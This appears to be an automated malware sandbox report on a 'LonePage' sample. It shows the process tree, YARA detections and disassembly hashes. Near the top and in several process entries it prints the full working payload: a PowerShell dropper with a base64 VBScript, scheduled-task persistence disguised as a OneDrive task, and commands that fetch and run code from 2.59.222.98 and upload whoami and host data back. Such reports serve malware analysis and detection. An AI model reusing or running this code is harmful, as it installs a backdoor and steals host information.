ZSI+Cgk8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczp4YXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iPgoJCQk8eGFwOkNyZWF0ZURhdGU+MjAyMy0wMi0xM1QwODo1OTo1NyswMTowMDwveGFwOkNyZWF0ZURhdGU+CgkJCTx4YXA6Q3JlYXRvclRvb2w+Q2Fub24gaVItQURWIDY1NTUgIFBERjwveGFwOkNyZWF0b3JUb29sPgoJCTwvcmRmOkRlc2NyaXB0aW9uPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczpwZGY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGRmLzEuMy8iPgoJCQk8cGRmOlByb2R1Y2VyPkFkb2JlIFBTTCAxLjNlIGZvciBDYW5vbjwvcGRmOlByb2R1Y2VyPgoJCTwvcmRmOkRlc2NyaXB0aW9uPgoJCTxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCgkJCQl4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8iPgoJCQkJPGRjOmZvcm1hdD5hcHBsaWNhdGlvbi9wZGY8L2RjOmZvcm1hdD4KCQk8L3JkZjpEZXNjcmlwdGlvbj4KCQk8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgoJCQkJeG1sbnM6eGFwTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iPgoJCQk8eGFwTU06RG9jdW1lbnRJRD51dWlkOmZkZWRlOTYzLTAwMDAtNDE0Mi00MzQ0LTQ1NDYwMDAwMDAwMDwveGFwTU06RG9jdW1lbnRJRD4KCQk8L3JkZjpEZXNjcmlwdGlvbj4KPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KPD94cGFja2V0IGVuZD0idyI/PgoKZW5kc3RyZWFtCmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvQ291bnQgMSAvS2lkcyBbMTAgMCBSIF0gPj4KZW5kb2JqCnhyZWYKMCAxNCAKMDAwMDAwMDAwMCA2NTUzNSBmIAowMDAwMDAwMDE2IDAwMDAwIG4gCjAwMDAwMDAyNjQgMDAwMDAgbiAKMDAwMDA1NTQ3MyAwMDAwMCBuIAowMDAwMDAwMzU4IDAwMDAwIG4gCjAwMDAwMjI0MzEgMDAwMDAgbiAKMDAwMDAyNjMwNCAwMDAwMCBuIAowMDAwMDI2NzAyIDAwMDAwIG4gCjAwMDAwNTEwODggMDAwMDAgbiAKMDAwMDA1MTE2OCAwMDAwMCBuIAowMDAwMDUxMzcwIDAwMDAwIG4gCjAwMDAwNTE2MTMgMDAwMDAgbiAKMDAwMDA1NDI2OCAwMDAwMCBuIAowMDAwMDU0NDUzIDAwMDAwIG4gCnRyYWlsZXIKPDwKL1NpemUgMTQKL0luZm8gMSAwIFIKL1Jvb3QgMiAwIFIKL0lEWzw3MTM0NGRlNzFjMTA3MzI1ZTY3MGEwMzQzMTY3Yjc5OT48NzEzNDRkZTcxYzEwNzMyNWU2NzBhMDM0MzE2N2I3OTk+XQo+PgpzdGFydHhyZWYKNTU1MzIKJSVFT0YK';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\document.pdf -value $fil -encoding byte;&$home\appdata\local\temp\document.pdf;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3RhcnQtc2xlZXAgKGdldC1yYW5kb20gLW1pbiA1IC1tYXggNDMpO3N0YXJ0LXNsZWVwIDExOyRpaWs9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRmbG09JGlpay5kb3dubG9hZGRhdGEoJ2h0dHA6Ly8yLjU5LjIyMi45ODo0MzgyMC9LZm5nbkhieEZIamF1Y2llL3BhZ2UxMDcvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskaGJuPUlFWCAkamtyOyRiamRvKz0kaGJufE91dC1zdHJpbmc7W2J5dGVbXV0kZHJweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiamRvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLzIuNTkuMjIyLjk4OjI4NDAyL3BhZ2UxMDcnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Recorded.vbs -value $c;schtasks.exe /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f;
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000000.00000002.2066672979.0000026B63953000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000000.00000002.2066672979.0000026B639B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:09:41:10
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:09:41:12
                                                                      Start date:30/09/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"
                                                                      Imagebase:0x7ff686a00000
                                                                      File size:5'641'176 bytes
                                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:4
                                                                      Start time:09:41:12
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f
                                                                      Imagebase:0x7ff763e70000
                                                                      File size:235'008 bytes
                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:09:41:13
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
                                                                      Imagebase:0x7ff635960000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2085530098.0000018899B05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2085268300.000001889994C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2085268300.0000018899957000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2085268300.0000018899997000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:09:41:14
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000006.00000002.3475796002.000001DE79AE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000006.00000002.3415629273.000001DE5F7E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:09:41:14
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:09:41:15
                                                                      Start date:30/09/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                      Imagebase:0x7ff6413e0000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:9
                                                                      Start time:09:41:15
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff7e52b0000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:09:41:15
                                                                      Start date:30/09/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1728,i,12702411498753033684,7387674129069318371,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                      Imagebase:0x7ff6413e0000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:15
                                                                      Start time:09:45:01
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
                                                                      Imagebase:0x7ff635960000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358131758.00000245D7680000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358131758.00000245D7686000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358131758.00000245D76C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358273831.00000245D7825000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000F.00000002.4358131758.00000245D76DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:16
                                                                      Start time:09:45:01
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.4545241066.00000107F6460000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.4545241066.00000107F64F2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000010.00000002.4521422067.000001078019C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:17
                                                                      Start time:09:45:01
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 00007FF848E937B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2126769549.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                                                        • Instruction ID: 4f6d13a1e641f644b83a0d5b89e1e045fb9419d8f6b4001dfd04de57bab85d14
                                                                        • Opcode Fuzzy Hash: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                                                        • Instruction Fuzzy Hash: FF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D736E882CB45

                                                                        Executed Functions

                                                                        Function 00007FF848F20D8E Relevance: .8, Instructions: 752COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3477802799.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a8a9c365174f43c5101b744ac5d7b3b9aaf51b14daf0b5a7e7581b6fe0d30c84
                                                                        • Instruction ID: 6512173439e5eb0e14bd885c75719f9b620c11a06acdb36a04cf4bae5588a347
                                                                        • Opcode Fuzzy Hash: a8a9c365174f43c5101b744ac5d7b3b9aaf51b14daf0b5a7e7581b6fe0d30c84
                                                                        • Instruction Fuzzy Hash: A0223432D0EACA4FE796AB7868151B57BE0EF463A4F0801FAD44CC70D3DE19A8458359
                                                                        Function 00007FF848F238E5 Relevance: .4, Instructions: 435COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3477802799.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d2ecaa307169e16f609a0c04158eae3064fecea35af98f01ac1b365eb4a4d67
                                                                        • Instruction ID: 5969f8586bcf877a6466e035960319826486d0d6bc9bd7c64d68c517342f6f62
                                                                        • Opcode Fuzzy Hash: 0d2ecaa307169e16f609a0c04158eae3064fecea35af98f01ac1b365eb4a4d67
                                                                        • Instruction Fuzzy Hash: 45D14371E0EA8A5FE795BB2C68555B97BE0FF16390F0801FAD00CC70E3DA19A805C756
                                                                        Function 00007FF848F20E5A Relevance: .1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3477802799.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848f20000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30b86ee0387603f06c104aee4eb816dcd1f265d14aef37c782a90134f4b95b61
                                                                        • Instruction ID: 7c26f298826765c20cbdb8a6807d700516094f8cd90ec6f85679ef2ebdd0eb52
                                                                        • Opcode Fuzzy Hash: 30b86ee0387603f06c104aee4eb816dcd1f265d14aef37c782a90134f4b95b61
                                                                        • Instruction Fuzzy Hash: DF31C033E1FE965FF6A9B76C246527865D0EF812E4F4800BAE81DC31D3DE0E5C844259
                                                                        Function 00007FF848E53A35 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3477232328.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_7ff848e50000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                        • Instruction ID: 0b9f109908e78bfd273596d1c677c9a80c13075b22e165c5df6a322a69224a52
                                                                        • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                        • Instruction Fuzzy Hash: 7301677111CB0C4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3651DB36E881CB45